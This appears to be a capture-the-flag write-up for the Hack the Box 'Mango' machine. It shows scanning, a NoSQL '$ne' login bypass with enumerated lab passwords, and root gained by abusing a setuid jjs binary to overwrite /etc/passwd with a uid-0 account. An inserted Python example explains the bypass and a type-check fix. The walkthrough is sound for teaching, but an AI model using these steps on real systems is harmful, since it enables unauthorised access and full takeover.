Hack the Box: Mango

Mango

User

nmap -sS -sV -n -p- mango.htb
-- snip --
PORT    STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
443/tcp open ssl/ssl Apache httpd (SSL-only mode)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
# openssl s_client -showcerts -connect mango.htb:443
CONNECTED(00000003)
depth=0 C = IN, ST = None, L = None, O = Mango Prv Ltd., OU = None, CN = staging-order.mango.htb, emailAddress = admin@mango.htb
-- snip --
Mango login page
username[$ne]=test&password[$ne]=test&login=login
Logged in to staging-order
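Why the [$ne] body above logs in, and the type check that stops it, as an added example that is not part of the original write-up. parse_form and matches are simplified stand-ins (assumptions) for PHP-style bracket parsing and a MongoDB-style equality/$ne match, and the user record is constructed.

```python
# Added example, not code from the write-up or from the target application.
from urllib.parse import parse_qsl

USERS = [{"username": "alice", "password": "constructed-secret"}]  # constructed data

def parse_form(body):
    """Parse a form body, turning key[sub]=v into {key: {sub: v}} (PHP-style)."""
    out = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        if key.endswith("]") and "[" in key:
            name, sub = key[:-1].split("[", 1)
            slot = out.setdefault(name, {})
            if isinstance(slot, dict):
                slot[sub] = value
        else:
            out[key] = value
    return out

def matches(doc, query):
    """Toy matcher: a plain value means equality, {"$ne": x} means not equal."""
    for field, cond in query.items():
        if isinstance(cond, dict):
            # Only $ne is modelled; any other operator never matches here.
            if set(cond) != {"$ne"} or doc.get(field) == cond["$ne"]:
                return False
        elif doc.get(field) != cond:
            return False
    return True

def login_vulnerable(body):
    # Parsed values go straight into the query, so a dict becomes an operator.
    form = parse_form(body)
    query = {"username": form.get("username"), "password": form.get("password")}
    return any(matches(u, query) for u in USERS)

def login_hardened(body):
    form = parse_form(body)
    user, pw = form.get("username"), form.get("password")
    # Reject anything that is not a plain string before it reaches the query.
    if not isinstance(user, str) or not isinstance(pw, str):
        return False
    return any(matches(u, {"username": user, "password": pw}) for u in USERS)

PAYLOAD = "username[$ne]=test&password[$ne]=test&login=login"  # body shown above
```

With the constructed record, login_vulnerable(PAYLOAD) succeeds because both fields become "not equal to test" conditions, while login_hardened(PAYLOAD) rejects the request on type alone.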
# python mango-enum-users.py 
admin
mango
# python mango-enum-password.py -u admin
t9KcS3>!0B#2
# python mango-enum-password.py -u mango
h3mXK8RhU~f{]f5H
# ssh mango@mango.htb
-- snip --
Password: h3mXK8RhU~f{]f5H
mango@mango:~$ su admin
Password: t9KcS3>!0B#2

$ cd /home/admin
$ cat user.txt
79b...

Root

$ find / -perm /4000 2>/dev/null
-- snip --
/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
-- snip --
openssl passwd -1 -salt tellico test123
$1$tellico$30TQ5Bff7wtirtpxbOqmR/
$ cd /tmp
$ cp /etc/passwd .
$ echo "tellico:\$1\$tellico\$30TQ5Bff7wtirtpxbOqmR/:0:0::/root:/bin/bash" >> passwd
$ echo "Java.type('java.lang.Runtime').getRuntime().exec('cp passwd /etc/passwd').waitFor()" | jjs
$ su tellico
Password: test123
root@mango:/home/admin/tellico# cd /root
root@mango:~# cat root.txt
8a8...

Tellico Lungrevink
